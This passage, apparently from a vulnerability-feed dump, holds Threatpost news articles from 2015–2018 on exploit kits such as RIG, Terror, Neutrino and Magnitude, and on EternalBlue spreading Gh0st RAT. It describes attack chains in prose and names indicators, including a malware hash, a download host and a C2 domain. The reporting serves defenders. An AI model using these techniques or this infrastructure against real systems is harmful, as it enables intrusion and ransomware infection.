July](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>).\n\nThe moves are positioning RIG to be the definitive exploit kit, for now at least, Zaharia said.\n\n\u201cWhen it comes to exploit kits, the dynamic is incredibly fast-moving. In the past month, two of the biggest exploit kit infrastructures were either taken down or suffered a big hit, so one of the other notorious exploit kits is bound to take advantage of the opportunity,\u201d Zaharia told Threatpost Wednesday, \u201cRIG is shaping up to be the go-to EK, but Magnitude, Sundown or others could also be working on their next big move.\n", "cvss3": {}, "published": "2016-09-21T09:29:38", "type": "threatpost", "title": "Picking Up Where Neutrino Left Off: RIG Pushing CrypMIC Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-8651", "CVE-2016-0189", "CVE-2016-4117"], "modified": "2016-09-21T13:29:38", "id": "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "href": "https://threatpost.com/rig-picks-up-where-neutrino-left-off-pushes-crypmic-ransomware/120735/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:52:15", "description": "What we can glean from a 2018 roundup of current web-threats is old vulnerabilities die hard. In a report, released by Palo Alto Networks Unit 42, researchers said so far this year cybercriminals are targeting unpatched PCs with ancient CVEs and well-known exploit kits.\n\nHere is a ThreatList from the research firm\u2019s _Current Trends in Web-based Threats_ report, released last month.\n\nIn the first quarter of 2018, Unit 42 found 1583 malicious URLs across 496 different domains. Attackers used at least eight old and public vulnerabilities. The Top 3 CVEs used are:\n\n 1. [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>): Vulnerability in [Microsoft Internet Explorer\u2019s VBScript](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>)\n 2. [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>): Vulnerability in [Microsoft Internet Explorer\u2019s VBScript](<https://threatpost.com/microsoft-patches-jscript-vbscript-flaw-under-attack/117993/>)\n 3. [CVE-2015-5122](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>): Vulnerability in [Adobe Flash Player](<https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776/>)\n\nUnit 42 also reported of the 1,583 URLs found in malicious emails it examined, 1,284 were exploit kit related.\n\nTop exploit kits are:\n\n * KaiXin\n * Sundown\n * Rig\n * Sinowal\n\n\u201cWe found Sundown and Rig EKs are slowing down not only in the number of vulnerabilities used but also in how often they are upgraded. However, KaiXin EK is still evolving. As we can see (below) KaiXin takes the lead when compared with Sundown and Rig. KaiXin was discovered in 2012 and became more and more active according our observations. The most exploited vulnerabilities in KaiXin are CVE-2016-0189 and CVE-2014-6322. We saw the very old EK Sinowal was also active with one malicious URL,\u201d [researchers wrote](<https://researchcenter.paloaltonetworks.com/2018/06/unit42-the-old-and-new-current-trends-in-web-based-threats/>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/06/25103219/EK_top_2018.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/06/25103219/EK_top_2018.png>)\n\n(ThreatList is an occasional overview of InfoSec landscape as represented in at-a-glance lists of relevant data.)\n", "cvss3": {}, "published": "2018-07-02T18:32:00", "type": "threatpost", "title": "ThreatList: Exploit Kits Still a Top Web-based Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6322", "CVE-2014-6332", "CVE-2015-5122", "CVE-2016-0189"], "modified": "2018-07-02T18:32:00", "id": "THREATPOST:A3BB2FFA95F5B0C5ED7362707F7E5AFE", "href": "https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:49", "description": "Over the past six months, the roar of exploit kits has [quieted to a whimper](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>). But that doesn\u2019t mean exploit kit threats are nonexistent. According to security experts, gangs behind them are regrouping, tweaking code and finding fresh software exploits to target.\n\nHere are the exploit kits and exploit kit trends to watch for over the next six months.\n\n**RIG: Down But Not Out**\n\nAccording to Zscaler, the RIG exploit kit is diminished, but continues to drop various ransomware payloads such as CryptoShield, Cerber and Locky, primarily in the geographic locations of South America, Southeast Asia, and Australia. That\u2019s a shift, according to Zscaler, from targeting Western Europe, North America, and Russia.\n\n\u201cUnless anything changes, Rig is the exploit kit to watch out for as we head into summer 2017,\u201d said Brad Duncan, threat intelligence analyst, Unit 42, Palo Alto Networks.\n\nHe said Rig is the most prevalent exploit kit Unit 42 has seen since Angler exploit kit disappeared in the summer of 2016 and Neutrino exploit kit went private later in September 2016. Rig was formerly a mid-tier exploit kit compared to others; however, it\u2019s been by far the most common since late 2016, he said.\n\nMicrosoft has also been tracking RIG (which it calls Meadgive). \u201cAttackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file,\u201d [Microsoft noted](<https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/>).\n\n**The Dawn of Sundown **\n\nAs RIG continues to diminish its impact, the Sundown exploit kit has been sluggishly gaining momentum over the past year. Recently, authors have made noteworthy changes to its landing page. According to Zscaler, those changes include rebranding the exploit kit \u201cNebula.\u201d\n\n\u201cWhere .xyz domains had been the primary choice for hosting landing pages, since Feb. 9, the [criminal organization Yugoslavian Business Network] has been registering domains with many other generic top-level domains in the name of Brian Krebs,\u201d [wrote Derek Gooley](<https://www.zscaler.com/blogs/research/top-exploit-kit-activity-roundup-%E2%80%93-winter-2017>), security researcher at Zscaler.\n\nEarlier this month, it was the Sundown exploit kit that gained some traction dropping the banker Trojan DiamondFox, Gooley said.\n\nFireEye reports Sundown has shown a propensity of adapting frequently to changes; for example, URI changes and incorporating new techniques such as steganography.\n\n**Magnitude at Low Volumes**\n\nOnce a dominant exploit kit, Magnitude is a shadow of its former threat, according to security experts. \u201cThe Magnitude EK continues to operate at low volume, with restricted regional distribution. We typically observe Magnitude affecting Southeast Asian users who visit illegal streaming sites,\u201d Gooley wrote.\n\nHe notes that Magnitude\u2019s modus operandi includes distribution via malicious ads distributed via popup and pop-under ad networks attempting to install the Cerber ransomware.\n\n**New Terrors **\n\nNew exploit kits also continue to surface, such as the Terror exploit kit; identified by Zscaler earlier this year. Terror is an example of a newer exploit kit cobbled together from pieces of other exploit kits such as Sundown and Hunter, according to a Zscaler.\n\nTerror is typical of newer exploit kits. \u201cIt\u2019s smaller, more customized and their target is much more defined and they have chosen a very specific geographic area to target,\u201d said Deepen Desai, senior director of research and operations at Zscaler. Keeping activity regional and limited in scope, he said, suggests criminals are fine tuning Terror before rolling it out to a larger pool of victims.\n\n[Check Point said](<http://blog.checkpoint.com/2017/04/13/marchs-wanted-malware-list-exploit-kits-rise-popularity/>) both Rig and Terror have recently been tracked delivering a wide variety of threats, from ransomware and banking Trojans to spambots and BitCoin miners. The security firm reported an uptick in Terror exploit kits in the month of March.\n\n**GongDa and KaiXin **\n\nResearchers are keeping their eyes on two older exploit kits targeting Korea named GongDa and KaiXin. In January, FireEye reported a Korean news site was redirecting visitors to the GongDa exploit kit, exposing them to malware.\n\n\u201cWhile GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering both Flash and VBScript exploits as well. Despite its shortcomings when compared to newer EK\u2019s such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively,\u201d wrote FireEye in a research [note earlier this year](<https://www.fireeye.com/blog/threat-research/2016/03/gongda_vs_koreanne.html>).\n\nZscaler has spotted a new KaiXin exploit kit campaign as recently as last month. KaiXin, first identified in 2012, also targets Asian sites (Korea in particularly). It\u2019s latest incarnation of the exploit kit features an older antivirus fingerprinting script that attempts to determine the use of security products on the targeted PC\u2019s filesystem before continuing execution. The KaiXin campaign offers exploits for Java, Flash, and Silverlight and if successful installs various Chinese adware packages.\n\n**New Targets**\n\nBut the vital ingredient to a successful exploit kit is a fresh supply of vulnerabilities. To that end, security experts at Unit 42 of Palo Alto Networks note a trend by cybercriminals to target new vulnerabilities in Microsoft\u2019s Edge browser.\n\nRyan Olson, intelligence director, said crooks behind Sundown have added new Microsoft Edge browser vulnerabilities to their list of attack vectors. Some of the vulnerabilities, according to Olson, include memory corruption flaws within the browser\u2019s rendering engine. He said Microsoft patched the vulnerability last year, nevertheless they found their way into Sundown exploit kit.\n\nAnother example of new targets comes from an exploit kit called DNSChanger, spotted in December by Proofpoint researchers. Proofpoint said the exploit kit is unique because the malvertising component of the attack doesn\u2019t target browsers, [rather a victim\u2019s router](<https://threatpost.com/dnschanger-exploit-kit-hijacks-routers-not-browsers/122539/>). The goal is to attack vulnerable routers running outdated software and open ports for malicious purposes.\n\n**Copycat Trend **\n\nResearchers at FireEye said they have noticed a bevy of low-level exploit kit copycat operations that are most likely one-man operations. \u201cWhile mostly recycling pre-existing techniques, their presence has been fairly consistent, albeit not being a huge threat in terms of numbers,\u201d said Zain Gardezi, staff vulnerability researcher at FireEye.\n\nIn these particular cases, it has been observed that the copycats are usually attached with one ad service for a longer period of time for malvertisment delivery, Gardezi said. Their usage of registered domains are also limited due to the fairly distinguishable pattern. \u201cSome copycats seem to use one particular IP for 3 to 4 days, instead of domain names, and then move on to another,\u201d Gardezi said. Sundown, for example, is known for using old exploits from older exploit kit packages from established players.\n\nWith so many big players out of commission, it has given rise to smaller players cutting-and-pasting old exploits to create their own patchwork EKs, FireEye said.\n\n**Exploit Kit Struggles **\n\nAccording to researchers, worries of a sudden resurgence in exploit kit activity are low. Unit 42\u2019s Duncan credits better browser security with reducing the effectiveness of exploit kits. Others credit stepped-up defensive mitigation efforts.\n\n\u201cGoogle Chrome is currently at 58 percent market share, and it\u2019s a much harder nut to crack for exploit kit authors, I think. Using Chrome as a web browser, I haven\u2019t been able to infect any Windows hosts through exploit kits in recent months,\u201d Duncan said.\n\nHe also notes the dwindling popularity of some favorite targets of exploit kits, such as Internet Explorer and Microsoft Edge, are pushing some threat actors out of the EK racket. Duncan said IE and Edge now only have a combined market share of 25 percent.\n\nFor its part, Microsoft\u2019s exploit research shows many of the operators behind exploit kits such as Neutrino aren\u2019t making splashy headlines anymore because many have gone into \u201cprivate\u201d mode, choosing to quietly cater to select cybercriminal groups.\n", "cvss3": {}, "published": "2017-04-14T06:00:26", "type": "threatpost", "title": "Exploit Kit Activity Quiets, But is Far From Silent", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-8651"], "modified": "2017-04-13T22:31:04", "id": "THREATPOST:CF1CC9C0D8290B4C256DFC08EEB34FE1", "href": "https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:40", "description": "The relatively new Terror exploit kit is bucking the downward trend in the EK market, and is steadily evolving into more of a threat.\n\nResearchers at Cisco Talos said Terror has abandoned an early strategy that included \u201ccarpet-bombing\u201d a target\u2019s browser to one that now uses exploits that precisely target a victim\u2019s particular browser configuration. It\u2019s also equipped with anti-detection features.\n\nThe kit is one of several new players that surfaced [after the market consolidated last year](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>), according to Cisco. \u201cWhen Angler and friends disappeared, new EKs started to try their luck. Many of them were far from [Angler\u2019s quality](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904/>). One of these was Terror EK,\u201d wrote Holger Unterbrink and Emmanuel Tacheau, researchers at [Cisco who posted their research Thursday](<http://blog.talosintelligence.com/2017/05/terror-evolved-exploit-kit-matures.html#more>).\n\nOver the past several months, researchers say they have seen a \u201cfast evolution up to the latest version\u201d of Terror.\n\n\u201cWe identified a potentially compromised legitimate website acting as a malware gate, redirecting visitors initially to a RIG exploit kit landing page, then switching to Terror exploit kit one day later,\u201d they wrote.\n\nTo Cisco, this is an indicator that criminals behind Angler, RIG and Terror are likely sharing resources or pirating the others\u2019 means of distribution and attack tools.\n\nAs to Terror\u2019s biggest improvements, researchers said the exploit kit now has the capability to evaluate a victim\u2019s user environment (operating system, patch level, browser version and installed plugins) and use only the most potentially successful exploits against the victim.\n\nThis makes it harder for an investigator to fully uncover which exploits they have, Unterbrink and Tacheau wrote. Terror is also using cookie-based authentication in its attack chain. \u201cThis prevents anyone from downloading the exploits directly. Someone who did not follow the full attack chain may be a competitive cyber criminal who is trying to steal the exploits or a forensic investigator,\u201d researchers wrote.\n\nThe exploits Terror is using aren\u2019t new, just new to Terror, said Nick Biasini in an interview with Threatpost.\n\n\u201cIn the past, Terror would send a wide array of exploits at the end system hoping that one would compromise the system. Today, Terror is more selective and leverages the information gained from the landing page to deliver exploits to which the system is potentially vulnerable,\u201d Biasini said.\n\nThe attack chain observed by Cisco begins with a compromised website that redirects the victim to the Terror landing page using an \u201cHTTP 302 Moved Temporarily response.\u201d The landing page is filled with random \u201cLorem Ipsum\u201d text and also some obfuscated JavaScript code to evaluate the target\u2019s browser environment and plugins in use such as ActiveX, Flash, PDF reader, Java, Silverlight and QuickTime, researchers wrote.\n\n\u201cThe _POST _request generated by this page is answered with an HTML page including a JavaScript and a VBScript. These scripts include the URL pointing to the CVEs they are going to exploit,\u201d Unterbrink and Tacheau wrote. After assessing and exploiting a browser\u2019s vulnerability, attackers then attempt to download the final malware.\n\nIn one instance observed by Cisco, a JavaScript file exploited a use-after-free vulnerability in Microsoft Internet Explorer 6-10 vulnerability ([CVE 2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>)). \u201cAfter exploitation, it generates another JScript file, writes it to disk and executes it via command line,\u201d researchers explain. \u201cThis script downloads the encrypted binary stream from the EK website, decodes it, saves it to disk with a random name and finally executes it.\u201d\n\nThe executable used was a variant of the Terdot.A/Zloader malware downloader, Cisco said.\n\nResearchers say they have observed similar behavior while monitoring the Sundown exploit kit, which also drops the Zlaoader malware. \u201cTerror EK is known for using exploits used by Sundown, so it seems to be they also use payloads from Sundown,\u201d researcher said.\n", "cvss3": {}, "published": "2017-05-19T14:22:23", "type": "threatpost", "title": "Terror Exploit Kit Evolves Into Larger Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2017-05-19T18:22:23", "id": "THREATPOST:48D183653EE317814B4447BF6FA92654", "href": "https://threatpost.com/terror-exploit-kit-evolves-into-larger-threat/125816/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Today\u2019s most prolific exploit kit is RIG, which has filled a void left by the departure of Angler, Neutrino and Nuclear. That has made it public enemy No. 1 when it comes exploit kits. Now Cisco Talos researchers are hoping to shed new light into the ongoing development of the potent EK in hopes of neutralizing the RIG EK threat.\n\nAs with the unraveling of any EK, one of the keys to stopping infection rates is determining infection routes and how adversaries bypass security software and device.\n\nIn a deep analysis of RIG, [Cisco Talos team outlined recently](<http://blog.talosintel.com/2016/11/rig-exploit-kit-campaign-happy-puzzling.html>) the unique nature of the exploit kit. In a nutshell, like other exploit kits the crew behind RIG are using gates to redirect their victims to their exploit kit. But what makes RIG unique, according Cisco Talos researchers is the way RIG combines different web technologies, such as DoSWF, JavaScript, Flash and VBscript to obfuscate the attack.\n\nMaking matters worse, each separate attack strategy utilizes \u201cdynamically changing encoding and encryption for all files transmitted. Talos dissection of RIG also reveals this technique ensures scripts look different every time an attack session is launched. This, Cisco Talos said \u201censures (attackers) can\u2019t be detected by simple string matches or hash values.\u201d\n\nAt the heart of the RIG attack, researchers say, is a three-pronged attack strategy that leverages either a JavaScript, Flash, VBscript-based attacks as needed.\n\nWith RIG, when it comes to the delivery of malware files, \u201cthe same malware file often gets written and executed multiple times on the victim\u2019s PC. If one method doesn\u2019t work or is blocked by an anti-malware solution, they have a couple of backup methods. All stages and methods are obfuscated, some more, some less,\u201d Cisco Talos wrote.\n\nAs part of its RIG campaign analysis Cisco Talos noted that most infections were initiated through compromised websites. \u201cThese are websites which were hacked and then the adversaries added malicious code into the website which redirected the user to the gate. The gate then redirects the user to the EK landing page,\u201d according to Holger Unterbrink, the author of the blog.\n\nTo a lesser extent, Unterbrink said, other RIG campaigns used gates which were using malvertising techniques, redirecting traffic to the adversary\u2019s infection chain. Here victims are funneled into either a JavaScript, Flash, VBscript-based attack. In the end, all of these scripts are downloading and execute the same malware file which the exploit kit wants to install on the victim\u2019s machine.\n\nStage one of the attack is driving traffic to a compromised website which starts the redirection chain. The compromised website loads a malicious Flash (SWF) file. Next, that Flash file inserts one or two iFrames into the compromised site. Now, the victim\u2019s browser is redirected via the iFrame to the gate.\n\n\u201cThe gate \u2013 which is nothing else than another web site on another server \u2013 does some checks and redirects the user again, but now to the exploit kit landing page \u2013 again another web page on another server,\u201d Unterbrink said.\n\nLastly, the exploit kit landing page includes three JavaScript variables \u2013 a JavaScript which loads a Flash (SWF) exploit, a VBscript with an exploit, and a third JavaScript that also contains an exploit. \u201cThis is a very complex infection chain with all of these steps using their own obfuscation techniques,\u201d Unterbrink said.\n\nThe SWF file is heavily obfuscated by commercial protection software called DoSWF, a professional Flash SWF encryptor. This Flash file itself, creates two malicious iFrames, according to Talos, that are served up inside a malicious website. One is generated instantly, the other is generated and placed into the compromise website a bit later after a timer in the first Flash file times out.\n\nUnterbrink says the reason for the timed delay is unclear, but theorizes it could be as a backup mechanism if the first compromise fails.\n\nNext, depending on vulnerabilities in the victim\u2019s browser, either iFrame, both filled with JavaScript code, redirects the victim to the RIG exploit kits landing page. Here the victim\u2019s browser is faced with three embedded scripts hidden inside corresponding JavaScript variables.\n\nOne of the scripts hidden inside the RIG EK landing page is a VBscript. \u201cAfter a couple of tests on the target system, (the VBscript) executes the DoMagic() function, which downloads the main malware payload of the campaign such as ransomware using the URL stored in the script,\u201d according to Talos.\n\nA second script is also present on the RIG EK landing page that has the capability of inserts random comments such as \u201c/*sw7586sdd*/\u201d in between the JavaScript code used, Talos notes. \u201cThese comments are changed per session, which means that the Base64 encoded blob looks different in every session,\u201d Talos researcher wrote in a technical write up outlining their research.\n\nThis script then executes another malicious Flash (SWF) file that is once again obfuscated by the [DoSWF](<http://www.doswf.org/>) Flash tool. Talos says it is working on de-obfuscating the code, but for now asserts the code \u201cseems to be a type of shellcode payload which gets decoded at runtime, combined with other strings stored in the SWF, and finally executed by an exploit.\u201d\n\nThe remaining JavaScript file in the RIG exploit kit landing page, according to Talos, is exploiting CVE-2013-2551 (aka MS13-037) to download and infect the victim. MS13-037 is a vulnerability that exploits an integer overflow vulnerability on Internet Explorer, according to a [Microsoft security bulletin from May 2013](<https://technet.microsoft.com/en-us/library/security/ms13-037.aspx>).\n\n\u201cThe vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. The exploit has been built and tested specifically against Windows 7 SP1 with Internet Explorer 8,\u201d according to a technical description of MS13-037 by Rapid7.\n\nAccording to Talos, MS13-037 includes code that drives the victim to a URL to download the final EK malware.\n\nIn the campaigns tracked by Cisco Talos for this report, it said payloads included ransomware (mainly CRYPTFILE2 and including Locky and CryptXXX), Trojans (Gamarue and Gootkit) and some broken executables, Unterbrink said.\n\nProtecting against RIG disabling all unnecessary browser plugins, recommends Cisco Talos. \u201cPatching and updating is mandatory for all browsers and their plugins. Any browser with an unpatched outdated Flash plugin will get infected, it is just a question of time,\u201d Unterbrink said. That time horizon, he said will be small. \u201cI would guess something from minutes to a few days, depending on your luck and surfing behavior.\u201d\n", "cvss3": {}, "published": "2016-11-04T17:58:47", "type": "threatpost", "title": "Inside the RIG Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2016-11-04T21:58:47", "id": "THREATPOST:98820CBC19A99D41A0F54773D962C7D7", "href": "https://threatpost.com/inside-the-rig-exploit-kit/121805/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:37", "description": "Researchers have detected a malvertising campaign running on a pair of sites owned by Huffington Post that is using ads distributed through an AOL ad network. The attack is sending victims through a series of redirects that eventually brings them to a landing page that is running an exploit kit.\n\nThe campaign emerged first on huffingtonpost.ca on Dec. 31 and researchers from security firm Cyphort soon found it on the main Huffington Post site in the United States as well. The researchers discovered that the campaign originates with ads being served by AOL\u2019s Advertising.com network and once a user clicked on a malicious ad, she was redirected through a number of hops\u2013some using HTTPS\u2013until she hit a landing page. That page contained an exploit kit that was serving both Flash and VB script exploits.\n\nThe landing pages appear to be compromised Polish sites.\n\n\u201cInterestingly attackers used a mix of HTTP and HTTPS redirects to hide the servers involved in this attack. The HTTPS redirector is hosted on a Google App Engine page. This makes analysis based on traffic PCAPs more difficult, because HTTPS traffic is encrypted,\u201d the Cyphort [analysis](<http://www.cyphort.com/huffingtonpost-serving-malware/>) of the attack says. AOL has taken steps to shut down the campaign.\n\n\u201cIt appears that this group has compromised and/or has access to multiple .pl domains in Poland, and is making redirects via sub-domains for these sites (nysa.pl, klodzko.pl, etc).\u201d \n\nThe malvertising campaign extended to a number of other sites beyond the Huffington Post domains, the researchers said, and the exploit kit used in the attack appears to be the [Neutrino kit](<https://threatpost.com/neverquest-trojan-adds-new-targets-capabilities/108076>). The infection begins with a Javascript attack and then the code decrypts an HTML file and a VB script file. The HTML file is loaded in an iframe, the researchers said, and exploits an old vulnerability, the CVE-2013-2551 use-after-free flaw in Internet Explorer. The VB script then downloads a malicious executable.\n\n\u201cThe purpose of this attack is to install a malicious binary \u2013 a new variant of a Trojan, from the Kovter family. (SHA1: eec439cb201d12d7befe5482e8a36eeb52206d6f). The malware was downloaded from indus.qgettingrinchwithebooks.babia-gora.pl:8080 , it was a un-encrypted binary. After execution it connects to a16-kite.pw for CNC. It executes through injecting its payload to a spawned svchost.exe process,\u201d the researchers say.\n\nCyphort\u2019s researchers got in touch with the abuse team at AOL and they attack stopped soon after.\n\n\u201cWe have escalated this issue to AOL security team ([advertising.com](<http://advertising.com/>) infection). They are investigating. We have not talked to Huffington Post or dozens of other infected websites, yet. Shortly after we notified AOL , the attack has discontinued,\u201d Nick Bilogorskiy, a Cyphort researcher, said in a statement.\n\n_Image from Flickr photos of [Stuart Rankin](<https://www.flickr.com/photos/24354425@N03/>). _\n", "cvss3": {}, "published": "2015-01-06T14:25:29", "type": "threatpost", "title": "Malvertising Campaign Hits AOL Ad Network, Leads to Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2551"], "modified": "2015-01-07T14:45:55", "id": "THREATPOST:F2E9B170455BA915DEFBB02F2E1BFFDD", "href": "https://threatpost.com/malvertising-campaign-uses-aol-ad-network-leads-to-exploit-kit/110230/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:36", "description": "EternalBlue, the exploit used in the [WannaCry ransomware outbreak](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>), is now being leveraged to distribute the Nitol backdoor and Gh0st RAT malware.\n\nSecurity researchers at FireEye said, just as WannaCry criminals did, threat actors are leveraging the same Microsoft Server Message Block (SMB) protocol vulnerability ([MS017-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)).\n\n\u201cWe observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,\u201d wrote co-authors Ali Islam, Christopher Glyer and Barry Vengerik in a FireEye [report](<https://www.fireeye.com/blog/threat-research/2017/05/threat-actors-leverage-eternalblue-exploit-to-deliver-non-wannacry-payloads.html>) posted Friday.\n\nGh0st RAT is a Trojan that has targeted the Windows platform for years. It has [pimarily been a nation-state tool](<https://threatpost.com/malware-hunter-crawls-internet-looking-for-rat-c2s/125360/>) used in APT attacks against government agencies, activists and other political targets. Gh0st recently made headlines when instances of the RAT were found by the Shodan tool called [Malware Hunter](<https://malware-hunter.shodan.io/>), a new crawler designed to find command and control servers.\n\nAccording to FireEye, Backdoor.Nitol has been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX Object that affects older versions of Internet Explorer. In the past, Backdoor.Nitol and Gh0st have also been delivered via exploitation of the [CVE-2014-6332](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) vulnerability and in spam campaigns that target PowerShell commands, researchers said.\n\n\u201cThe initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have been seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server,\u201d researchers wrote.\n\nResearchers said they have seen the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore and Backdoor.Nitol in the South Asia region.\n\nThe analysis of how Backdoor.Nitol and Gh0st exploit Windows follows the threat actors behind WannaCry \u2013 attackers send specially crafted messages to a Microsoft SMBv1 server.\n\n\u201cThe attacker echoes instructions into a new \u20181.vbs\u2019 file to be executed later. These instructions fetch the payload \u2018taskmgr.exe\u2019 from another server in a synchronous call. This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream,\u201d researchers said.\n\nUltimately, \u201cthe \u20181.vbs\u2019 executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location,\u201d researchers said. Next, the Nitol or Gh0st RAT binary is downloaded.\n\n\u201cThe addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads,\u201d researchers said.\n", "cvss3": {}, "published": "2017-06-02T14:32:11", "type": "threatpost", "title": "EternalBlue Exploit Spreading Gh0st RAT, Nitol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2017-06-06T11:15:52", "id": "THREATPOST:0A77C4DD63E33A11E6E2957F79023DE8", "href": "https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:19", "description": "Researchers identified a new ransomware family called Magniber that uniquely targets only users in South Korea and the Asia-Pacific regions. The ransomware is primarily being distributed by the Magnitude exploit kit, a primary distribution vehicle in the past for Cerber ransomware.\n\nBecause of Magniber\u2019s close affiliation to both the Magnitude EK and and Cerber, researchers are calling the new ransomware Magniber, a mashup of both names.\n\n\u201cMagnitude EK activity fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined and now it is distributing ransomware known as Magniber,\u201d wrote FireEye in a report released [Thursday on the new ransomware strain](<https://www.fireeye.com/blog/threat-research/2017/10/magniber-ransomware-infects-only-the-right-people.html>).\n\nOver the past few days other researchers have also spotted similar Magniber activity. Trend Micro noted Magnitude EK activity had vanished briefly two week prior to the Oct. 15 Magniber attacks. Researchers there also said that while ransomware Cerber, SLocker and Locky often were used in focused attacks they had never targeted assaults on specific geographic regions.\n\nAs for the malware\u2019s payload, Magniber ransomware will not execute if the system language is not Korean, according to FireEye researchers Muhammad Umair, Zain Gardezi and Shahzad Ahmad who co-authored the report.\n\n\u201cThe malware calls GetSystemDefaultUILanguage, and if the system language is not Korean, it exits,\u201d FireEye said.\n\nMagniber encrypts user data using AES128, researchers at FireEye said, noting its Magniber sample differed from that found by other researchers.\n\n\u201cThe malware contains a binary payload in its resource section encrypted in reverse using RC4. It starts unpacking it from the end of the buffer to its start. Reverse RC4 decryption keys are 30 bytes long and also contain non-ASCII characters,\u201d researchers said.\n\nAfter unpacking in memory, the malware starts executing the contents of the payload. Part of that process includes using a 19-character long pseudorandom string to constructs 4 URLs for callbacks used to identify and avoid executing the ransomware on a virtual machine.\n\nIf the Magniber ransomware is executed, the malware then starts to encrypt user files on the system, renaming them by adding a \u201c.ihsdj\u201d extension to the end. Once it\u2019s accomplished this task, the malware then issues a command to delete itself.\n\nAccording to Trend Micro, hackers are using the Magnitude EK in conjunction with malvertising campaigns and exploiting a memory corruption vulnerability ([CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) in Internet Explorer (9 through 11), patched last year.\n\n\u201cWhile the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk \u2013 especially those running old software versions and not using ad blockers,\u201d FireEye researchers noted.\n", "cvss3": {}, "published": "2017-10-21T10:00:04", "type": "threatpost", "title": "New Magniber Ransomware Targets South Korea, Asia Pacific", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189"], "modified": "2017-10-21T10:00:04", "id": "THREATPOST:732D47548D1F723578CC0BCC66F37872", "href": "https://threatpost.com/new-magniber-ransomware-targets-south-korea-asia-pacific/128567/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Gamers may soon be feeling the pain of crypto-ransomware.\n\nA variant of CryptoLocker is in the wild that goes after data files associated with 20 